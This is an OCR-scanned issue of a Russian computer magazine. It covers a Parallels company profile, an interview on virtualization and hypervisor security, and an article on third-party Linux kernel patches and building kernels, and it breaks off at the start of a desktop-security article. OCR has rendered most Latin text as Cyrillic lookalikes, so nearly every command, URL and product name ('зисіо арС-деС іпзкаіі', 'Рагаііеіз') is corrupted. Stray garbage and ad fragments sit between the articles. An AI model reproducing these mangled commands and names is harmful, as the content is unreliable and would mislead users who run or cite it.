Іпіеі Сарііаі. 

Налаживались и продажи ПО для автоматиза- 
ции — Сергей Белоусов все же не зря колесил 
по свету и общался с людьми, стараясь доско- 
нально узнать, что нужно сервис- провайде- 
рам от софта. 

Еще в 2003 году 5ѴѴзоІІ поглотила компанию 
Ріезк I пс. —крайне популярную благодаря 
одноименной панели управления для сервис- 
провайдеров, и, как выяснилось, базирующу- 
юся в Новосибирские. Именно в Ріезк разра- 
ботали и выпустили сверхпопулярный продукт 
для автоматизации хостинга, фактически 
ставший стандартом в мировой индустрии 
(мегодня он называется Рагаііеіз Ріезк Рапеі]. 
Среди решении в области виртуализации 
имеются высокотехнологичный Рагаііеіз 



ѴІГІІЮ 220 Сопіаіпегз, Рагаііеіз ѴѴогкзІаІіоп, 
Рагаііеіз 5егѵегдля Мае, а также продукт для 
массовых пользователей Рагаііеіз Безкіор 
для Мае. Вплоть до 2008 года Рагаііеіз остава- 
лась дочерней компанией холдинга БѴѴзоІІ, но 
затем было принято решение о ребрендинге и 
полном слиянии. Тогда-то и произошел столь 
редкий прецедент— новообразованная ком- 
пания решила использовать не свое прежнее 
имя, а имя своей «дочки», чьи продукты уже 
успели заработать на рынке определенный 
вес и репутацию. 

Каково будущее Рагаііеіз — сказать слож- 
но, все же мы не оракулы и не провидцы, а 
рынок порой меняется стремительно. Однако 
заявить, что компания хорошо закрепилась в 
сфере ПО для виртуализации и автоматиза- 
ции, уже можно смело. Сегодня Рагаііеіз не 
только поддерживают и развивают написан- 
ный ранее софт, но и пристально следят за 
новыми технологиями, и наверняка разраба- 
тывают что-нибудь новенькое, разумно храня 
свои новые идеи в тайне. «Продаваться» 
кому-либо Рагаііеіз пока не планируют — 
напротив, у лидеров компании есть желание 
и далее держать Рагаііеіз в роли независи- 
мой единицы, а в будущем разместить ее на 
бирже. 

Интересен и тот факт, что Рагаііеіз на 
сегодняшний день очень тесно сотруд- 
ничает с рядом российских вузов — с 
Новосибирским и Московским универ- 
ситетами, с московским Физтехом и так 
далее. На вопрос «зачем?» в Рагаііеіз 
отвечают, что, вкладывая свое время и 
средства в обучение студентов, они не 
только готовят себе новые кадры, но и в 
целом воспитывают себе смену, растят 
новое поколение айтишников. Ведь не- 
даром лидеры Рагаііеіз всегда верили в 
то, что наши инженеры и специалисты — 
одни из сильнейших и лучших в мире. И в 
случае Рагаііеіз эта вера полностью себя 
оправдала, □с 
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ИНТЕРВЬЮ С РАКАІШ.8 

НА ЭТИ ВОПРОСЫ ОТВЕЧАЕТ НИКОЛАЙ ДОБРОВОЛЬСКИЙ 




Если говорить о РагаІІеІз ОезкТор Тог Мае и Тог ѴѴіпсІо\л/$ и Ыпих интерес- 
но было бы узнать, насколько охотно производители железа идут на 
встречу «эмуляторщикам», и как далеко заходит это сотрудничество? 

Мы тесно взаимодействуем со всеми ключевыми поставщиками железа. 
Они всегда предоставляют нам ранние образцы своих продуктов для тес- 
тирования совместимости, и чтобы мы могли как можно раньше начать 
использовать новую функциональность железа в своих программах. За- 
интересованность втаком взаимодействии и у производителей железа, 
и у разработчиков обоюдная. Все хотят, чтобы их клиенты были довольны 
комплексно продуктом и тем, какой решает ихзадачи. 

Вопрос, в некотором роде, продолжающий предыдущий: насколько 
хорошо железо будущего будет адаптировано под эмуляторы и гото- 
вы ли к этому разработчики оных (в частности - вы)? 

Конечно, все производители железа уже давно осознали перспектив- 
ность виртуализации. Все инфраструктурные компоненты будут рано или 
поздно виртуализированы. Но эмуляторы - это не виртуализация. Эмуля- 
тор создан для того, чтобы эмулировать какие-то команды посредством 
других доступных команд. В основном, он нужен для работы программ 



одной архитектуры на другой. Например, можно запустить приложение 
іРбопе в эмуляторе на Мае. Виртуализация -это кардинально другая тех- 
нология. Практически все команды, которые исполняются в виртуальной 
машине, работают нативно на процессоре. Проигрыш в производитель- 
ности эмулятора в сотни-тысячи раз, а при виртуализации он минима- 
лен, т.к. используются обычно простаивающие при нормальной работе 
компьютера ресурсы. 

С точки зрения безопасности - насколько безопасно исполнение кода 
в виртуальной среде и не может ли быть «пенетраций», схожих с 
пофиксеными в ѴМѵѵаге в свое время? 

Ошибки возникаютв любом коде. И гипервизор не исключение. Поэтому 
совсем исключать возможность обнаружения таких ошибок в будущем 
невозможно. Тем не менее, объём кода в гипервизоре достаточно мал, 
а интерфейсы просты и постоянно анализируются на предметбезопас- 
ности. Поэтому вероятность появления ошибок в гипервизоре, скажем, 
ничуть не больше, чем в ВІ05. В случаеже обнаружения ошибокони быс- 
тро исправляются, и обновления тут же доставляются пользователям. И 
это намного проще, чем если ошибка допущена вжелезе. Например, в 
процессорах Іпіеі Репбит была ошибка операции деления и компания 
отзывала эти процессоры даже из уже проданных компьютеров. Поэтому 
сточки зрения безопасности нетособых отличий между исполнением 
программы или ОС внутри виртуальной машины или напрямую, особенно 
учитывая то, что все больше и больше функций берет на себя процессор 
позапускуэтих ВМ. 

Любому разбирающемуся человеку понятно, что больше «фишек» бу- 
дет реализовано в гипервизоре, тем сложнее, массивнее и «прожорли- 
вее» получится код. Нашли ли вы некий баланс производительности/ 
качества в этом вопросе, на большие ли «жертвы» приходится идти? 

Да, конечно, при разработке гипервизора очень важно оптимизировать 
код та ким образом, чтобы в нём был реализован только «минималь- 
но-необходимый»функционал. Мы это отлично понимаем и всегда 
старались следовать этому принципу. Поэтому нельзя сказать, что нам 
приходится идти на какие-то жертвы - просто мы следуем базовым при- 
нципам разработки нашего продукта. 

При этом, в гипервизоре нет кактаковых фишек, есть возможность 
эффективно запускать виртуальную машину. Все функции, которые 
добавляются к нашему приложению, не связаны в большинстве своем 
сзапуском ВМ. Они нацелены на повышениеудобства работы пользо- 
вателя с приложением. Ведь в результате пользователю важна не голая 
производительность какого-то микро задания, а в целом скорость и 
удобство работы со своим компьютером. Поэтому все наши особо люби- 
мые пользователями «фишки», потребляя какое-то минимальное коли- 
чество дополнительных ресурсов, предоставляют массу преимуществ. 
Например, есть функция ЗтагіЗеІесІ:, которая позволяет вам открыть 
ваш ѴѴогб-документс рабочего стола Мака сразу в виртуальной машине 
под ѴѴіпсІоѵѵз. И вам не надо для этого специально предварительно 
запускать виртуальную машину, переноситьтуда файл документа, откры- 
ватьтам ѴѴогб, потом в нем открывать этот до куме нт, и «через левое ухо» 
пересохранять внесенные изменения сначала в ВМ, а потом в версию с 
рабочего стола Мака. Мы все это делаем на автомате. И нетак важно, что 
для этого сценария требуется сразу несколько фишек и ЗплаііЗеІесІ, и 
ЭЬагесІРоІсІегз, и ЗНагесІРгобІез и Собегепсе. Они, естественно, чуть-чуть 
загружают процессор, зато наши пользователи в целом выигрывают во 
много раз в удобстве и скорости выполнения своих задач. 
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Обзор патчей для Ипих, не входящих в ванильное ядро 

Есть много причин, по которым хорошую перспективную технологию могутне 
принимать в официальную ветку І_іпих — Линус славится своими жесткими 
требованиями к новому коду. Но отэтого факта менее интересными такие 
технологии не становятся. И иногда ради них стоит пересобрать ядро с 
наложением стороннего патча. 



КАКИМИ БЫВАЮТ ЛИНУКСЫ 

Ванильным (официальным] принято считать 
ядро, которое можно найти на кегпеі.огд . и глав- 
ным покровителем которого является сам Линус. 
На сайте можно скачать старое ядро ветки 2.4.x 
(которое уже практически не поддерживается] 
или несколько стабильных (или не очень :) ] ядер 
ветки 2.6.x. Нестабильные ядра имеют суффикс 
«-гс», а ежедневные снапшоты издй'а — «гс-діЪ». 
Обычно выходит 7-9 гс-релизов, прежде чем ядро 
обретает статус стабильного. В среднем, стабиль- 
ные релизы выходят4-5 раз в год, а последний на 
момент написания статьи релиз — 2.6.35. 

иыих-кт 

Пожалуй, самый известный сторонний патч. 
Позволяетпревратитьобычный І_іпих в ОС 
реального времени. И хотя главное примене- 
ниетакой операционки — промышленные и 
встроенные системы, на обычном десктопе она 



тоже может быть интересна. Например, тем, кто 
часто занимается обработкой звука или видео 
или постоянно грузитсистему какими-нибудь 
ресурсоемкими вычислениями. Встречаются 
также свидетельства о положительном эффекте 
от применения этого ядра на ЫдЫоаб -сер ве- 
рах. Я же ничего, кроме слегка упавшей общей 
производительности системы, не заметил. 
Скачать патч можно по адресу ѵѵѵѵѵѵ. кегпеі. 
огд/риЬ/Ііпих/кегпеІ/рпэіесІз/гІ:/ . Последняя 
стабильная версия — 2.6.33.6-0:27. В некоторых 
дистрибутивах геаШте-ядроуже присутствует 
в репозитории. Например, в ІЛэипІи для уста- 
новки О-ядра достаточно выполнить 

$ зийо арО-деД іпзДаІІ Ііпих-гО 

В других же дистрибутивах ядро с этим патчем 
можно легко собрать. Для этого надо наложить 
патч на ванильное ядро и при конфигурирова- 



нии указать опцию Ргосеззогіуре апб Іеаіигез 
Ргеетрііоп Мобе (Сотріеіе Ргеетрііоп 
(Реаі-Тіте]]. И еще рекомендуется отклю- 
чить опцию Кегпеі Ьаскіпд Сбескіогзіаск 
оѵеОІоѵѵз, так какона повышает латентность. 
Чтобы можно было собирать некоторую статис- 
тику по времени отклика, при конфигурирова- 
нии нужнотакже включить: Кегпеі Ьаскіпд 
Тгасегз-> Кегпеі Рипсііоп Тгасег, Іпіеггиріз-оіі 
І_аІепсуТгасег, Іпіеггиріз-оіі І_аІепсу Нізіодгат, 
Ргеетрііоп-оіі І_аІепсуТгаѵег, Ргеетрііоп-оіі 
І_аІепсу Нізіодгат, ВсЬебиІіпд І_аІепсу Тгасег, 
ВсЬебиІіпд І_аІепсу Нізіодгат, Міззеб Іітег 
оіізеіз Ызіодгат. После сборки ядро должно 
содержать в имени РРЕЕМРТ и РТ, например: 

$ипате-ѵ 

#1 8МР РКЕЕМРТ КТ Шей Аид 4 00:40:34 
УЕК8Т 2 010 
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ІГТОЖ Ч итогиш;, ВУПМ5 
ЦѴТКГ РЩИ ЕМЙШЬ $ѵРК*Г 
Рз& т‘МОпые'5 Ѵ^ггч Ч&ь Си>*, 

4^ ОЗЗИ. ТНЕ ОР Ш(Г ОТ ІОД . 

/ оотал няѵг 5(/ярегра? эггогн 
( Гщ.-5й?ЁЕѴ РІА5И ігсеоѵст? 




Ситуация с поддержками новых бич в ядре :1 



Чтобы потешить собственное самолюбие, можно включить 
сбор статистики: 

# есЬо 1 >/зуз/кегпе1/с!еЪид/кгасіпд/1аЦепсу_ 
М зк / епаЫе /макеир 

Саму статистику смотрим тут: 

$ дгер -ѵ " 0$" /зуз/кегпе1/<іеЪид/кгасіпд/ 
1акепсу_Мзк/макеир/СРШ 

Самое интересное там: значения минимального, среднего и 
максимального времени отклика. 

ВР5 

Широко известный в узких кругах анестезиолог-линуксоид 
Кон Коливас с переменным успехом поддерживает собс- 
твенную ветку (точнее, набор патчей] Ріпих. Главным новов- 
ведением в его патчсете является новый планировщик ВР5 
(Вгаіп РискЗсЬесМег), являющийся альтернативой стан- 
дартному СР5 и показывающий, по результатам тестов, улуч- 
шенную отзывчивость ядра на десктопе (другими словами, 
при использовании ВРЭжадные до графических ресурсов 
приложения получаютощутимый прирост производитель- 
ности, а раздражающие паузы, возникающие, например, 
при переключении между ресурсоемкими программами, ко- 
торые требуют доступ кдиску, становятся менее заметными, 
либо исчезают совсем). Скачать исходники можно отсюда: 
ѵѵѵѵѵѵ.кегпе[.огд/риЬ/[іпих/кегпе[/реор[е/ск/раІсЬе5/2.6. 
После наложения патча (текущая версия — 2.6.34-ск1 ) ста- 
нет доступна опция ОепегаІЗеІир ВРЗсри зсбесіиіег. 

КЕІ5ЕКР5 

Исходя изтестов и многочисленных отзывов, это очень 
быстрая файловая система. В настоящее время ее разра- 
боткой занимается наш соотечественник, Эдуард Шишкин, 
и группа энтузиастов. Эдуард полон оптимизма и решитель- 
ности включить Пеізег4 в ванильное ядро. Последний на 
момент написания статьи патч (геізег4-1 : ог-2.6.34. раІісЬ.дг:] 
скачать можно здесь: [ІрУЛір.кегпеІ.ога/риЬ/Ііпих/кегпеІ/ 
реор[е/ес!ѵѵагб/геІ5ег4/геІ5ег4-1 : ог-2.6 . После наложения 
патча появится опция Рііе Зузіетз -> Пеізег4. Но поддержка 
ядром ФС — это еще не все. Чтобы можно было оперировать 




Опции агзесигііѵ 

с разделами геізег4, надо поставить геізег4ргодз. Во многих 
дистрибутивах этот комплект утилит есть в репозитории: 

$ зисіо арС-деС іпзкаіі геізег4ргодз 

Соответственно, основные операции с ФС: 

• ткі : 5.геІ5ег4 — создать раздел с геізег4; 

• І5ск.геізег4 — проверить раздел с геізег4; 

• теазиге! : 5.геІ5ег4 — посмотреть параметры раздела с 
геізег4. 

6К5ЕСІЖІТѴ 

Патч, содержащий потрясающее количество механизмов 
для повышения защищенности Ріпих-системы. Опции 
компиляции дгзесигііу расположены в Зесигііу орбопз 
Огзесигку. Есть три уровня безопасности на выбор: низкий, 
средний и высокий. Низкий уровень рекомендован, когда 
более высокиеуровни не подходят из-за использования 
нестандартного набора ПО. Он содержит: 

• защиту ссылоки ПРО — пользователям запрещается 
переходить по ссылкам (писать в ПРО], владельцем которых 
является другой пользователь; 

• запрет пользователям на чтение сітезд — у всех пользо- 
вателей, кроме гоор отберут право на чтение системных 
сообщений ядра; 

• начальную защиту сЬгоо! — рабочая директория для всехтол ько 
что запущенных в песочнице приложений будет принудительно 
установлена в корневую директорию сбгооР 

В среднем уровне защиты дополнительно добавятся технологии: 

• дополнительные ограничения для приложений, запус- 
каемых в сбгооР запрет монтирования и ткпоб (создание 
именованных каналов, специальных символьных и блочных 
файлов), запретна двойной сбгоор запретна запись в зузсФ 
и другое; 

• ограничение прав на чтение/ргос для пользователей, не 
входящих в заранее заданную группу (по умолчанию ѵѵбееі); 

• ограничениезаписи в/беѵ/ктет,/сІеѵ/тепп и/сіеѵ/рогр 

• рандомизация адресного пространства; 

• серьезное логирование подозрительных событий (не- 
удавшихся вызовов Рогк() , попытокизменения системного 
времени, сигналов вроде 5І65Е0Ѵ и подобных). 

Высокий уровень еще больше затягивает узлы, так как 
дополнительно: 

• ограничиваетправа на чтение/ргос — теперь пользо- 
ватели смогутчитать из/ргос информациютолько о своих 
процессах. Можнотакже указать ОЮ специальной группы, 
которая сможет читать любую информацию из/ргос. 

• накладываетограничения на работу процессов в сбгооі:- 
окружении: отключение возможности устанавливатьзиісі- 
бит, отключение возможности посылать некоторые сигналы 




НТТР://ѴѴѴШ 

■ I 

> Цпкб 

кегпеІпеѵѵЫез.огд 
ІктРогд — архив 
почтовой рассылки 
Віпих Кегпеі Маіііпд 
Різі; 

Іідиогіх.пеі — 

РеЬіап-репозиторий 

для тех, кому лень 

самому собирать 

геп-кегпеі 

дгзесигку.пе! 

ссасбе.затЬа.огд 

геп-кегпеРогд 

кзріісе.сот 




> іпіо 



• Іакегооі: — 
эмулирует для 
программы 
получение рутовых 
привилегий. 
Позволяет создавать 
пакеты, не прибегая 
к зисіо. 

• Шедулер ВР5 
используется в 
проекте АпбгоісІ. 

• Утилита ЬаскЬепсЬ 
( беѵеІорег.озсІРогд/ 
сгаідег/ЬаскЬепсб/ 
згс/ЬаскЬепсб.с ) 
может пригодиться 
при тестировании 
планировщика 
ВР5. Она измеряет 
скорость создания 
указанного числа 
процессов и скорость 
обмена данных 
между ними. 

• Кегпеі СЬеск 
( ксЬеск.зРпеЧ — 
набор руШоп’овых 
скриптов, 
позволяющих за 
пару щелчков мыши 
сделать свежий беб- 
пакет ядра, включая 
необходимые патчи. 
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ІІІЧІХОЮ 




кзріісе.сот. Расценки на геЬооиезз 





Диіті |Ні И Н Д* 



■ 11*** Ы?ниі1 г Ѵ.Ц-ГБІ.Ё4ІІІМ-і(ІН 




1 ІЧЙІ4 ІМ кіні І^Г ■--*■ 

Ргккнг ідо Тшигя * 

Ршя- ш яшр ^ Л шё ШІ прілжж -* 
кг мНкіі ІКІ «Ес.І ■-■> 

І'КІПІІІІ Т<1* Р|ГРІ11 / ІМІЛШІ » 
г41іші Ь I г>л гир^лгі > 

МѴІ(Л ОПіНП мгі 

Іітаяі Вг|.мп ■■■► 

РІІи ъуНт 
мпчЛ ЬмКіч ■■■► 

Іпині 

■•■ сгзпічгірьіЕ т --> 

Г I Нпміизиіяі ■■■► 

№#Т гшАІішъ ■ т 



псопЛа — замена теписопЛа 



внешним процессам, ограничение на выполнение таких системных 
задач, какизменение системного времени или перезагрузка компа; 

• добавляет дополнительное логирование (втом числе всех тоипі/ 
итоипі); 

• включает рандомизацию стека ядра; 

• добавляетограничение на чтение информации о ядре через систем- 
ные вызовы для обычных пользователей (для гооі эта возможность 
остается). 

Необязательно в качестве ЗесигЕу Иеѵеі выбирать один из имеющихся 
уровней. Есть вариант Сизіот, позволяющий отдельно выбрать все 
необходимые опции. Еще одна интересная опция, Ѳгзесигііу ЗузсИ 
зиррогЕ позволит включать/отключать параметры безопасности через 
зузсП без необходимости пересобирать ядро. Так как эта директива 
отрицательно влияет на общую безопасность системы, ее рекомендуется 
использоватьлишь втестовых целях. 

Помимоуровней безопасности при конфигурации можно включить/ 
отключить КВАС (Роіе Вазеб Ассезз Сопітоі) —управление доступом на 
основе ролей. Управление пользователями и их ролями осуществляется 



Скажи «нет!» ребуту 

Допустим, у тебя есть высоконагруженный ргобисбоп-сервер, который 
должен быть доступен 24x7. Он отлично работает, да вот беда — вышел 
зесиіку-ирсіаію ядра твоего дистрибутива, и надо бы перезагрузиться. 
Но ребут — это боѵѵпЕі те сервера. И оставлять сервер суязвимос- 
тью — тоже не дел о. Придется искать второй сервер для временного 
переноса функционала с первого. Есть выход гораздо проще: можно 
обновлять ядро, не переза гружаясь, а используя кздіісеюот — плат- 
ный серверобновлений для ядер распространенныхдистрибутивов. 
Установка очень проста — добавляется репозиторий и ставится 
программулина ирігаск. Потом делается 

# ирСгаск-ирдгасІе 

И все обновления установлены! Правда, «ипате -а» все еще показы- 
вает старую версию. Зато 

# ирСгаск-зІюм 

расскажет всю правду об установленных апдейтах. 

В дополнение система еще имеет веб-интерфейс, где можно посмот- 
реть статус всех своих подключенных серверов, умеет присылать на 
е-таііуведомления о выходе новых патчей. И такое гебоойезз счастье 
стоит, в принципе, нетакуж и дорого — $3,95 в месяцза один физичес- 
кий сервер (если серверов больше 20, то $2,95). Естьтриальный доступ 
на 30 дней. А поддержка десктопной убунты вообще бесплатна. 

В общем, сказка, если б не одно «но» — все это работаеттолькосо 
стандартным ядром твоего дистра — никакихтебе патчей и обновле- 
ний версий ядра. 



с помощью специальной утилиты д га сі т 2 , присутствующей в большинс- 
тве дистрибутивов: 

$ зисіо арС-деС іпзСаІІ дга<5ш2 

2ЕЫ-КЕРЫЕЬ 

2еп-кегпеІ — наверное, самая большая пачка заплаток ядра в одном 
месте. Позиционируется как быстрое ядро для десктопов. Получить геп- 
кегпеі можно тремя способами: 

• скачатьархив с последним релизом (за номером 2.6.34-2еп1); 

• забрать версию суже наложенными патчами из діКа; 

• скачать патч для нужной версии и наложить самому. 

У них есть два репозитория: геп-зІаЫе. д к (с патчами, наложенными на 
стабильное ядро) и іеп.діі (синхронизация с дк-хранилищем Линуса и 
наложение тестовых патчей). 

Набор сторонних патчей меняется от релиза крелизуи наданный мо- 
мент включает в себя: 

• патчи от Кона Коливаса (втом числе ВЕ5); 

• Реізег4; 

• Ыпих-РНС — проект, позволяющий снижать напряжение СРІІ для 
уменьшения энергопотребления итемпературы; 

• обновленные и добавленные дрова (для ЕепоѵоТЬіпкРаб БЕ, 
6атесиЬе/ѴѴіі, МасЬоок, ѴѴіЕі -чипов и другого); 

• Тихопісе — патч, реализующий продвинутый ЫЬегпаіе («спящий 
режим» — при выключении содержимое ОЗУ скидывается на винт, при 
включении — восстанавливается); 

• поддержка ЕаіЕЕЕ — формата бинарников, содержащего в одном файле 
варианты для нескольких архитектур (аналог ІІпіѵегзаІ Віпагу в Мае 05 X); 

• ОагикоЕЗ — виртуальная ФС, предоставляющая оп ассезз доступ к 
файлам. Широко используется различными антивирусами. 

УНИВЕРСАЛЬНАЯ СБОРКА 

Итак, ядро и патчи выбраны, можно приступать к сборке. Опишу сборку 
своего ядра на примере ІІЬііпІи, хотя в других дистрибутивах последова- 
тельностьдействий будетаналогичной. Если нужно просто пересобрать 
имеющееся ядро (изменив опции конфигурации), то проще скачать 
исходники ядра с помощью стандартного менеджера пакетовтвоего 
дистрибутива и собиратьуже их: 

$ зисіо арС-деС іпзСаІІ Ііпих-зоигсе 

Но мне геп-кегпеі нравится больше, чем стандартное депегіе-ядро 
иЬипШ, поэтому его и буду мучить. Поставим все, что может пригодиться 
для сборки: 

$ зисіо арР-деС іпзРаІІ ЪиіІсІ-еззепРіаІ 1іЬпсигзез5-сіеѵ \ 
1іЬдРк2 . 0-сіеѵ 1іЬд1асіе2 -сіеѵ ІіЪдРЗ -тр-сіеѵ діР-соге 

Добавим своего юзера в группу зге, чтобы можно было без проблем 
собирать в/изг/зге: 
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* О О агіерІфпсІерЫаріор: ~/1_іпих 


Файл Правка Вил Терминал Справка 


а 0ер{ Набери * ІарТор : 


-/Ьіпих$ те<ГйигеТ$. геі5ег4 /0еѵ/5с)Ы 


теаэигеі^. геівег4 1 


.Ѳ.7 1 


СоругідМ (С) 2ѲѲ1- 


2ѲѲ5 Ьу Нап 5 Иеізег, Іісепвіпд доѵегпссі Ьу 


геі^вМргсід^/СОРѴІМО. 


Тгее 5Із1:І5Ііс5 ... 


допе 


Раскіпд ПаІіПісь: 




ЕогтаНеО поОез: 


3842.990 (93.82%) 


ЕгапсЬ поде*: 


3144.500 ( 76.77%} 


ТУід погіез: 


3946. 65Ь (96.35%} 


Ьеаі погіез: 


4001.770 (97.70%) 


ІЧойе 5Іа1:І5І:іс5: 




тотаі погіе$: 


158Ѳ13 


РогЕлзиеО поОез: 


36Ѳ39 


іШогтаиегі погіе$ 


: 121974 


БгапсН погіе*: 


б 


Тыід погіе$: 


535 


І_еа? погіез: 


15747Ѳ 


Нет 




ТОТЭІ ІТЙПІ15 : 


147112 


Мойсріг І1еш5: 


36Ѳ38 


Ьіаібзіа Нетк: 


41101 


Рігегѵігу Петв: 


3025 


Таіі Негоь: 


58364 


Ех*егѵ( Пет$: 


8584 


а0ер1@а<іерРІар!ор: 


-7І.іпііх$ 



Состояние раздела с геізегД 



$ зисіо изегтосі -а -С зге асіерС 

Клонируем дк-репозиторий (приготовься скачать около 500 метров): 

$ ссі /изг/зге 

$ діС сіопе діС : / /геп-кегпеі . огд/кегпеІ/геп-зкаЪІе . дік 
1іпих-2 . б-геп 

Смотрим, какие ветки есть в репозитории: 

$ діС Сад # кроме патченных, доступны также ванильные 
версии 

Выбираем последнюю патченную версию: 

$ діС скескоиС ѵ2.б.34-геп1 

Сорцы не обязательно вытягивать из дік Еслиты ограничен потрафику 
или скорости инета, то быстрее и дешевле будет скачать патч и офи- 
циальное ядро. Заплатка накладывается следующим образом: 

$ с<і /изг/згс/1іпих-2 . б . 34 
$ 2 саС . . /раСсЪ-2 . 6 . 35 .Ьг2 I раСсіі -рі 

Утилита раіебтакже имеет замечательную опцию '--бгу-гип', позволяю- 



щую протестировать, как наложится патч, прежде чем его накладывать. 
Далее выбираем способ конфигурирования ядра: 

• такесопбд — для тех, у кого уйма свободного времени. Система задаст 
несколько тысяч вопросов (по одному на каждую опцию конфигурации); 

• таке аІІпосопбд/аЦуезсопбд — генерируется конфиг, в котором на все 
вопросы отвечено по/уез; 

• таке беіюопбд — конфигс настройками поумолчанию; 

• таке гапбеопбд — самый веселый способ — использует Великий Ран- 
дом для ответа на вопросы; 

• таке оШсопбд — при использовании старого конфига. Задаст вопросы 
только про те пункты, которых не было в старом конфиге; 

• таке теписопбд — псевдографический, использующий псигзез, 
интерфейс; 

• таке псопбд — одно из нововведений ядра 2.6.35. Тоже псевдогра- 
фический, использующий псигзез, интерфейс, но выглядит несколько 
более свежо, чем теписопбд; 

• такехсопбд — графический интерфейс на базе ОТ; 

• таке дсопбд — графический интерфейс на базе ВТК. 

Мне больше привычен интерфейс теписопбд. 

Какие-то конкретные советы по конфигурированию ядра давать сложно 
— всеоченьсильнозависитотимеющегося окружения ижелаемых 
результатов. Ноя всегда придерживаюсь нескольких простых правил: 

• Все, что мнеточно понадобится (втом числе поддержка ФС, на которой 
у меня/) и будет нужно часто, я включаю в ядро. Все, что может приго- 
диться или будет нужно редко — компилирую модулем. Все, что точно не 
пригодится, соответственно, выкидываем. 
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Статистика по латентности 



• Опции с пометкой ЕХРЕКІМЕІ\ІТАІ_ лучше не включать без край- 
ней на то необходимости. Также не рекомендуется включать Оеѵісе 
Огіѵегз Зіадіпд Огіѵегз. Ядро может просто не собраться или 
работать не стабильно. 

• Чтобы не путаться в ядрах, добавляю суффикс версии ядра в 
ОепегаІБеІир -> Еосаі Ѵегзіоп. 

Также неплохой отправной точкой может стать кон фи г дистрибутив- 
ного ядра. После того, как конфиг готов (и сохранен в файл .сопЕд), 
можно приступать к сборке: 

$ таке 

С помощью опции «~\» можно указать количество потоков, что немно- 
го ускорит компиляцию на многоядерном процессоре. В зависимости 
от мощности компа и опций конфигурации, ядро может собираться по 
часу и даже больше. После компиляции начинается установка: 

$ зисіо таке тосіи1ез_іпз1іа11 
$ зисіо таке іпзкаіі 

На самом деле модули просто скопируются в /ІіЬ/тосІиІез/, а ядро с 
конфигом — в /ЬооЕ Создаем іпіігсі для нашего нового ядра: 



Турбо-компиляция 

Далеко не всегда получается с первого раза собрать идеально рабо- 
тающее ядро — обязательно забудешь включить какой-нибудь модуль 
или наложить какой-нибудь патч. А новая сборка, особенно на мало- 
мощном компе, можетбыть раздражающе дол гой. В та ком случае на 
помощь придет ссасЕе, умеющий кэшировать результаты компиляции. 
В результате повторная пересборка проходитзначительно быстрее. 
Для использования ссасЕе при сборке ядра набирай 

$ таке СС="ссас]ге дсс" СХХ="ссасТіе д++" 

Весь кэш будет храниться в каталоге -/.ссасЕе, а статистику по его 
использованию можно посмотреть с помощью команды 

$ ссаске -з 



$ зисіо ирйаке-іпікгат^з -к ѵ2 . 6 . 34-гепІ -с 
Обновляем конфигурацию дгиЬ, чтобы он нашел новое ядро: 

$ зисіо ирсіаке-дгиЬ 

Все, можно идти в ребут, скрестив пальцы и затаив дыхание, загру- 
зиться с новым ядром. 

КОМПИЛЯЦИЯ. ОЕВІАІЧ-ѴѴАѴ 

Выше я описал способ, которым можно собрать ядро в любом дист- 
рибутиве. Но практически во всех ди страх есть свой путь, дающий 
те или иные «плюшки», самая большая из которых — получение на 
выходе пакета с ядром, который можно легко поставить или удалить 
штатным пакетным менеджером. 

В ОеЬіап/ІІЬипІи за сборку ядра отвечает таке-кркд. Для того, чтобы 
воспользоваться таке-кркд, установим один пакет: 

$ зисіо арС-деС іпзкаіі кегпеі-раскаде 

Генерация конфига про и сходит точно также, каки вспособевыше.а 
сборка несколько иначе: 

$ ЛакегооС таке-кркд --іпікгсі --геѵізіоп=тукегпе1 \ 
кегпе1_ітаде кегпе1_Ьеасіегз тосіи1ез_ітаде 

Эта команда сначала соберет ядро, а потом создаст два пакета: Ііпих- 
ітаде-ѵегзіоп-геѵізіоп.сІеЬ (бинарники модули ядра] и Ііпих-Ееасіегз- 
ѵегзіоп-геѵізіоп.сІеЬ (заголовочные файлы ядра], которые будутлежать в/ 
изг/згс. Ставим то, что получилось, и идем на перезагрузку: 

$ зисіо сіркд -і /изг / зге/ * . сіеЬ 
$ зисіо геЬоок 

МАКЕ СОМРІ.ЕТЕ 

К сожалению, журнал не резиновый, и рассказать получилось далеко 
не про все заслуживающие внимания патчи. За бортом остались 
ОрепѴХ и Хеп, Орепѵѵаіі, а также целый класс патчеетов — дистрибу- 
тивные (ведь очень небольшое количество дистрибутивов исполь- 
зует ванильное ядроЬзс 
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У НАС КАСТИНГ... 



НОВЫЙ ТЕЛЕКАНАЛ ДЛЯ МУЖЧИН 



ГТКЛАМА 



СКОРО В ЭФИРЕ 








ШІХОЮ 



Евгений Зобнин гоЬпіпгадтаіІ.сот 



Плюс 100 
к защите 



Круговая оборона Ышіх-десктопа 



Открытые ІЛ\І IX- системы всегда славились своей безопасностью. 
Постоянный аудит кода, молниеносные выходы багфиксов, хорошо 
продуманная политика разграничения прав доступа — все это сделало их 
очень привлекательным продуктом, которому можно доверить хранение 
даже самой конфиденциальной информации. Но значитли это, что мы можем 
полностью положиться на разработчиков и не должны «допиливать» свою 
систему самостоятельно? Нет, каждый случай установки ОС уникален 
и требует подкручивания винтиков. 



Безопасность машины — понятие весьма 
многогранное, для разных людей оно может 
иметь совершенно разные значения. В рам- 
ках одной статьи мы не сможем охватить их 
все, поэтому давай сразу определимся стем, 
что и от кого будем защищать: 

1 . Человек — существо общественно-зави- 
симое. В любой сфере жизни нас окружают 
люди. Дом, место учебы, работа — везде 

и всегда мы находимся в обществе других лю- 
дей, не все из них чисты на руку, бескорыстны 
и холодны к чужим секретам. Поэтому первая 
линия обороны — это, конечно же, обеспече- 
ние защиты от физического доступа к машине 
во время нашего отсутствия. 

2 . Интернет полон придурков, кул-хацкеров 
и просто любопытных людей. Никто из нас 
не хочет подвергнуться взлому со стороны 
одного из них (или всех сразу). Поэтому 
вторая линия обороны — это защита сетевых 
рубежей от вторжения. 

3. Взломав машину, те самые придурки, кул- 
хацкеры и просто любопытные люди захотят 



получить доступ к нашим важным данным, 
включая пароли, сертификаты, кукисы и 
архивы баз данных, которые мы стащили, 
взломав чужую машину. Поэтому третья 
линия обороны — защита конфиденциаль- 
ных данных от посторонних глаз с помощью 
сокрытия информации или шифрования. 

4 . Получив желаемое, ПКЛ (придурки, кул- 
хацкеры, любопытные) захотят оставить 
на твоей машине черный ход, который в 
будущем будут использовать для регулярного 
обновления своего архива твоими данными, 
а также для рассылки спама или проведения 

0005. Четвертая линия обороны — проверка 
системы на наличие руткитов и прочей дряни. 
5 . Даже если ПКЛ не засунут в недра машины 
свой бэкдор или 005-бота, они все равно 
захотятуйти в чисто английской манере, не 
оставив после себя не только нежного «Тебя 
